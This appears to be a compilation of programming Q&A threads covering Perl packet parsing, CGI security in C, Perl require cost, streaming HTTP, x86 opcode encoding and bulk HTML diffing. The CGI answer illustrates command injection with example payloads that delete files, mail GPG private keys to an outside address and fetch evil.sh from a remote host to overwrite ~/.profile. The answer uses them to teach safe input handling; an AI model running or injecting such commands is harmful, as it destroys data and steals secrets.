Perl network frame/packet parser

I am writing a small sniffer as part of a personal project. I am using Net::Pcap (really really great tool).
In the packet-processing loop I am using the excellent Net::Frame for unpacking all the headers and getting at the data. I am getting concerned that this might not be terribly efficient (Net::Frame is great but seems to be more than I need for this project).
Also I dislike that for some Debian systems I had to manually compile libdumbnet (the package provided in the official apt repositories didn't seem to work, Net-Libdnet-0.92 didn't like it).
All I want is to get at the payload inside a TCP segment. Is there an alternative?
Thank you.
P.S. Would it be really really bad (read "thedailywtf.com worthy") if I just took the packet and searched it for some pattern?

I recently wrote a PCAP dump file unpacker in C and then afterwards wished I'd just used the open source libraries instead (when I realised they existed and were so easy to use). I have to say that as it's a binary file format it's probably easier to do in C than Perl, but I'll no doubt get boo'ed by all the Perl fanatics out there.
What I will say is that using existing code will be quicker all round than coding it yourself, but if you really really want to, the file format is freely available online and is really quite simple.
As for searching for a pattern, it almost certainly won't work. It's a binary file format and the packets can be fragmented and/or duplicated, so the only reliable way to know where a message starts and ends is by unpacking the headers, checking the packet flags, reading the content length field, etc. etc. Doing pattern searches may work 90% of the time, but at some point you'll find a packet capture log that means you need to change your code. And then a while later find another packet that means another change, and so on and so forth.
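For what it's worth, if Net::Frame feels heavier than you need, the header unpacking described above comes down to a few unpack calls. What follows is only a minimal sketch, assuming an Ethernet II link layer, IPv4, no VLAN tags and unfragmented packets; tcp_payload is a made-up name, not part of Net::Pcap or Net::Frame, and it does no TCP stream reassembly or duplicate detection.

```perl
use strict;
use warnings;

# Return the TCP payload of a raw Ethernet II frame, or nothing (undef in
# scalar context) if the frame is not plain, unfragmented IPv4/TCP.
# Assumptions: Ethernet II framing, no VLAN tag, no IPv6.
sub tcp_payload {
    my ($frame) = @_;
    return if length($frame) < 14 + 20 + 20;    # shortest Ethernet+IPv4+TCP

    # Ethernet II: 6 bytes dst MAC, 6 bytes src MAC, 2 bytes EtherType.
    my $ethertype = unpack('n', substr($frame, 12, 2));
    return unless $ethertype == 0x0800;         # IPv4 only

    # IPv4: byte 0 = version/IHL, bytes 2-3 = total length,
    # bytes 6-7 = flags/fragment offset, byte 9 = protocol.
    my $ip = substr($frame, 14);
    my ($ver_ihl, $total_len, $flags_frag, $proto) = unpack('C x n x2 n x C', $ip);
    my $ihl = ($ver_ihl & 0x0f) * 4;            # header length in bytes
    return unless ($ver_ihl >> 4) == 4 && $ihl >= 20 && $proto == 6;
    return if $total_len < $ihl + 20 || $total_len > length($ip);
    return if $flags_frag & 0x3fff;             # MF flag or nonzero offset

    # Using the IP total length drops any Ethernet padding after the datagram.
    my $tcp = substr($ip, $ihl, $total_len - $ihl);

    # TCP: the high nibble of byte 12 is the data offset in 32-bit words.
    my $data_off = (unpack('x12 C', $tcp) >> 4) * 4;
    return if $data_off < 20 || $data_off > length($tcp);

    return substr($tcp, $data_off);
}
```

In a Net::Pcap loop callback the raw packet is normally the third argument, so something like `my $data = tcp_payload($_[2]);` should be the whole integration, provided the capture really is Ethernet.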

Related

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see offhand: you are calling system() directly on <the_message>. Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account@hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
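If you would rather not write the plaintext to disk at all, one alternative is to start the program with its arguments as a list (so no shell ever parses them) and feed the message on standard input. This is only a sketch in Perl, assuming a Unix-like system; run_with_stdin is a made-up helper name, and it writes all input before reading any output, which is fine for contact-form sized messages but could block on very large ones.

```perl
use strict;
use warnings;
use IPC::Open2;

# Run a command given as a LIST of program and arguments, write $input to its
# stdin, and return everything it prints on stdout. Because the command is a
# list with separate arguments, user text never reaches a shell.
sub run_with_stdin {
    my ($input, @cmd) = @_;
    my $pid = open2(my $out, my $in, @cmd);
    print {$in} $input;
    close $in;                                  # signal end of input
    my $output = do { local $/; <$out> };       # slurp all of stdout
    close $out;
    waitpid $pid, 0;
    die "@cmd exited with status " . ($? >> 8) . "\n" if $?;
    return $output;
}

# Intended use with the options from the question (needs gpg installed):
#   my $armored = run_with_stdin($message,
#       'gpg', '--encrypt', '--recipient', '31A49121CD42FF00', '--armor');
```

The message is only ever data on a pipe here, so a ";" or "&&" inside it has no special meaning.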
A slightly deeper look
Okay, so what's going on in terms of using C? Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with a main focus on C for the last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyway and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug, harden and augment it because it had some horrible buffer overflow issues left, right and center, non-existent UTF-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

How expensive is: require "foo.pl";

I'm about to rewrite a large portion of a project that I have developed over the last 10 years while learning Perl. There is a lot of optimisation to be gained.
A key part of the code is a large if/elsif block that requires xxx.cgi files depending on a POST value. E.g.:
if($FORM{'action'} eq "1"){require "1.cgi";}
elsif($FORM{'action'} eq "2"){require "2.cgi";}
elsif($FORM{'action'} eq "3"){require "3.cgi";}
elsif($FORM{'action'} eq "4"){require "4.cgi";}
It has many more iterations, but just how expensive is using "require" in Perl?
require itself has a relatively low cost in any case and, if you require the same file more than once within a single run of your program, it will detect that the file has already been loaded and not attempt to load it a second time. However, if you have a long and highly-populated search path (@INC) and you require (or use) a lot of files, it's possible that all of the directory searches could add up; this isn't common (and doesn't sound likely in your case), but it can be improved by reorganizing your module directories so that the things you're loading show up earlier in @INC.
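The load-once behaviour is easy to see for yourself. A small sketch, assuming a writable temp directory; the file name action1.pl and the counter are invented for the demonstration:

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

our $load_count = 0;

# Write a tiny file that bumps a counter every time it is actually executed.
my $dir  = tempdir(CLEANUP => 1);
my $file = File::Spec->catfile($dir, 'action1.pl');
open my $fh, '>', $file or die "cannot write $file: $!";
print {$fh} "\$main::load_count++;\n1;\n";
close $fh or die "cannot close $file: $!";

# Ask for the same file three times; only the first require compiles and runs it.
require $file for 1 .. 3;

print "file was loaded $load_count time(s)\n";
print "and is recorded in \%INC\n" if exists $INC{$file};
```

The second and third require only look the name up in %INC, which is why repeating a require within one run costs next to nothing.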
The potentially-major performance hit referred to by earlier answers is the cost of compiling the code in the files you require. Getting rid of the require by moving the code into your main program will not help with this, as the code will still need to be compiled. In your case, it would probably make things worse, as it would cause the code for all options to be compiled on every request rather than only compiling the code used by the one action selected by the user.
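If the length of the if/elsif chain is what bothers you, a hash lookup keeps the "compile only the selected action" property. This is a sketch only: %handler_for and handler_file are invented names, and the file names simply mirror the ones in the question.

```perl
use strict;
use warnings;

# Hypothetical mapping from the POSTed action value to the file that handles it.
my %handler_for = (
    1 => '1.cgi',
    2 => '2.cgi',
    3 => '3.cgi',
    4 => '4.cgi',
);

# Return the file to load for an action, or undef for a missing/unknown action.
sub handler_file {
    my ($action) = @_;
    return unless defined $action;
    return $handler_for{$action};
}

# In the CGI itself this would be roughly:
#   my $file = handler_file($FORM{'action'}) or die "unknown action\n";
#   require $file;    # still only one file is compiled per request
```

Because only values listed in the hash are ever passed to require, arbitrary POST input cannot pick the file. Note that since Perl 5.26 the current directory is no longer in @INC, so a relative name may need to be written as "./1.cgi".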
As has been said, it really depends on the actual code in those files. Your best bet would be to do tests using Devel::NYTProf and/or Benchmark to see where the most time is being spent in your code if you are unhappy with its performance.
You can also read Profiling Perl on perl.com, but it is a bit outdated as it uses Devel::DProf.
Not an answer to your primary question, but still a good idea for a code refactor that I read recently on Ovid's blog.
The first time, possibly expensive; Perl has to search a path to find the file and load it up. Subsequent times, it's cheap -- a table is consulted and the file isn't actually loaded a second time. If this is in a CGI that is run once per request and then exited, then this is not too good.
It's really going to depend on the size of the files you're requiring. If you have massive CGI files, then it might hurt the performance of your software. If we're talking 6 or 7 lines of code each, then it's no issue. Try benchmarking your program's performance with and without, and make your own judgement.

Are there any HTTP connection iterators in Perl?

I'm trying to parse results from queries over HTTP that can return up to millions of lines, where each line needs to be parsed. Ideally I would read a line at a time from the connection and parse it as I go, so basically a FileHandle-esque iterator. The existing HTTP libraries all seem to fetch the content at once, although one can a) save to a file, or b) process chunks using a code ref. A is not ideal because it is a two-pass solution (the file would need to be read line by line after the data is transmitted, and it would take up storage, perhaps unnecessarily). B is not ideal because I would like to be able to return each line rather than handle it in a code ref; moreover, a chunk is not a line, so the chunk callback does not benefit from LWP's line reconstitution. I know there are non-blocking solutions (using AnyEvent and Coro), but these seem more interested in non-blocking-ness than in line-by-line processing. Can anyone point me in a good direction here, or am I barking up the wrong tree?
The callback lets you do anything that you want. You could make it so you buffer the input as you get it and read lines from the buffer. Perl lets you open filehandles on just about anything (using tie), including strings (with open). Anything else you might find is ultimately going to receive a chunk and turn it into lines anyway.
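The buffering idea can be sketched without any HTTP library at all. Everything named here (make_line_buffer and the three closures it returns) is invented for illustration; the only assumption is that lines end in "\n".

```perl
use strict;
use warnings;

# Build three closures around one shared buffer:
#   $feed->($chunk)  accepts raw data of any size,
#   $next_line->()   returns the next complete line, or undef if none is ready,
#   $flush->()       releases a final line that had no trailing newline.
sub make_line_buffer {
    my $buffer = '';
    my @lines;

    my $feed = sub {
        my ($chunk) = @_;
        $buffer .= $chunk;
        # Move every complete line out of the buffer; keep the partial tail.
        while ($buffer =~ s/\A([^\n]*)\n//) {
            push @lines, $1;
        }
        return;
    };

    my $next_line = sub { return shift @lines };

    my $flush = sub {
        push @lines, $buffer if length $buffer;
        $buffer = '';
        return;
    };

    return ($feed, $next_line, $flush);
}
```

With LWP::UserAgent you would call $feed->($_[0]) inside a ':content_cb' callback and then drain lines with `while (defined(my $line = $next_line->())) { ... }`; test with defined, because an empty line is a valid result. This is still driven by the callback rather than being a true pull iterator, but the parsing code only ever sees whole lines.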
Take a look at the accepted answer on What is the easiest way in pure Perl to stream from another HTTP resource? I haven't used HTTP::Lite myself, but it appears that it supports callback-based handling of received data, so that should work for you.

Is there some kind of tool to look at the encoding of Intel x86 instructions?

Forgive me if this might be a dumb question but, I'm in an assembly class that was mostly taught using an emulated CPU that was supposed to teach the concepts of assembly code. We haven't even written an Intel program, so I'm trying to adjust. In our emulated CPU, we were able to generate a symbol table file that gave the bytes equivalent for instructions:
http://imgur.com/tw5S8.png
Would I be able to do such a thing with Intel x86 instructions?
Try IDA. It has an option to show binary values of opcodes.
EDIT: Well.. it's a disassembler. Try opening a binary file, and set the number of opcode bytes to show (in Options/General/) to something that is not zero.
If you are looking for an IDE that shows you in real time the opcodes for the instruction you've used, then I don't think you'll find one, because of lack of "market". Can you explain why you need it? Do you want to know just their length, or want to learn them? There is a simple pattern for lengths, so by disassembling many binaries you'll catch it. If it's the opcodes you want.. well, there are lots of them, almost no rules, and practically no use in learning them.
I see.. then you have to generate the list file . Your assembler should have an option for that. (for NASM it's -l listfile). Just put any instruction(s) in your .asm file, and generate listing for it. It should contain the binary encoding for each instruction.
First, get the Intel Instruction Set Reference, or, better, this link: http://siyobik.info/index.php?module=x86 . There you'll find that most opcodes have several encodings. In your particular case, bit 1 of the opcode specifies direction, and since both operands are registers, you can toggle the direction and swap the register codes, and the result will be the same. You usually have this freedom with register-to-register arithmetic operations. To check this, assemble the following source and disassemble the result with IDA:
db 02h, 0E0h
db 00h, 0C4h
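If you don't have IDA at hand, the claim can be checked by decoding the two byte pairs by hand. A small sketch that handles only opcodes 00h and 02h (the 8-bit ADD forms) with a register-direct ModRM byte; decode_add_r8 is a made-up name:

```perl
use strict;
use warnings;

my @reg8 = qw(al cl dl bl ah ch dh bh);    # 8-bit registers, codes 0..7

# Decode a two-byte register-to-register 8-bit ADD (opcode 00h or 02h).
sub decode_add_r8 {
    my ($opcode, $modrm) = @_;
    die "only opcodes 00h and 02h are handled\n"
        unless $opcode == 0x00 || $opcode == 0x02;
    die "only register-direct ModRM (mod = 11b) is handled\n"
        unless ($modrm >> 6) == 3;

    my $reg = ($modrm >> 3) & 7;           # middle three bits
    my $rm  = $modrm & 7;                  # low three bits

    # Bit 1 of the opcode is the direction bit:
    # 0 means r/m is the destination, 1 means reg is the destination.
    my ($dst, $src) = ($opcode & 0x02) ? ($reg, $rm) : ($rm, $reg);
    return "add $reg8[$dst], $reg8[$src]";
}

printf "%02X %02X  %s\n", @$_, decode_add_r8(@$_) for [0x02, 0xE0], [0x00, 0xC4];
# prints:
# 02 E0  add ah, al
# 00 C4  add ah, al
```

Both byte pairs come out as the same instruction, which is the "toggle the direction bit and swap the register codes" freedom described above.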
There is a demo program shipped with fasm.dll which has an editor and hex-viewer.

Tool to compare/diff HTML in bulk

I have a lot of HTML files (10,000's and GBs worth) scraped from a server and I want to check to make sure the server produces the same results after some modifications but ignore kinds of differences that don't matter, e.g. whitespace, missing newlines, timestamps, small changes in some kinds of number, etc.
Does anyone know of a tool for doing this? I'd really rather not do more filtering than I have to.
(Oh and it needs to run under linux)
You might consider using a clone detector such as our CloneDR. This tool parses large sets of computer program files (HTML is a special case), builds abstract syntax trees representing the essential structure of each file, and compares programs for similarity.
Because it is comparing essential program structure, it ignores inessential differences such as comments and whitespace, and determines that two code segments are either identical or that one can be obtained from the other by substituting other blocks of code. The latter allows the recognition of code that has been modified in various ways. You can see samples of clone detection runs on a variety of computer languages at the web site.
In your case, what you would be looking for are files in system A which are essentially clones (exact or near misses) of files in system B. As a general rule, if a file a is a variant of file b (e.g., with a few changes), CloneDR will report it as a clone and show the exact differences.
At the scale of 20,000 files, I can see why you want a tool, and I can see why you want near-miss matches rather than exact matches.
It doesn't run under Linux, but I assume your problem is hard enough to solve that this isn't what you are optimizing for.
I use WinMerge a lot on Windows, and from what I can see some people enjoy Meld on Linux, so perhaps that could do the trick for you:
http://meld.sourceforge.net/
Other examples I saw from a quick googling were Kompare, xxdiff.sourceforge.net, and kdiff3.sourceforge.net
(I could only post one link, so I wrote the addresses of xxdiff and kdiff3 as text.)
Beyond Compare is purchased software that is actually worth the money (I never thought I'd hear myself typing that!). It is GUI based but handles thousands of files very well. It will allow you to specify unimportant changes with regular expressions as well as whitespace (beginning, middle and end of line). The feature set is very extensive, check out a trial download.
I do not work for this company, I just use Beyond Compare every day at work and enjoy it every time!
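For a scripted take on the same idea of declaring unimportant differences with regular expressions, here is a rough sketch. The rules in @ignore are invented examples (an ISO-style timestamp, whitespace between tags, runs of whitespace) and would need adapting to the real pages; it is plain regex filtering, not HTML parsing.

```perl
use strict;
use warnings;

# Hypothetical rules for differences that "don't matter": [pattern, replacement].
my @ignore = (
    [ qr/\d{4}-\d{2}-\d{2}[ T]\d{2}:\d{2}:\d{2}/, '<TIMESTAMP>' ],  # mask timestamps
    [ qr/>\s+</,                                  '><'          ],  # whitespace between tags
    [ qr/\s+/,                                    ' '           ],  # collapse other whitespace
);

# Apply every rule in order and trim the ends.
sub normalize {
    my ($html) = @_;
    for my $rule (@ignore) {
        my ($pattern, $replacement) = @$rule;
        $html =~ s/$pattern/$replacement/g;
    }
    $html =~ s/\A\s+|\s+\z//g;
    return $html;
}

# Two pages count as the same if they are identical after normalization.
sub same_page {
    my ($old, $new) = @_;
    return normalize($old) eq normalize($new);
}
```

Run over matching pairs of files from the two scrapes, only the pairs for which same_page is false need a look in a visual diff tool.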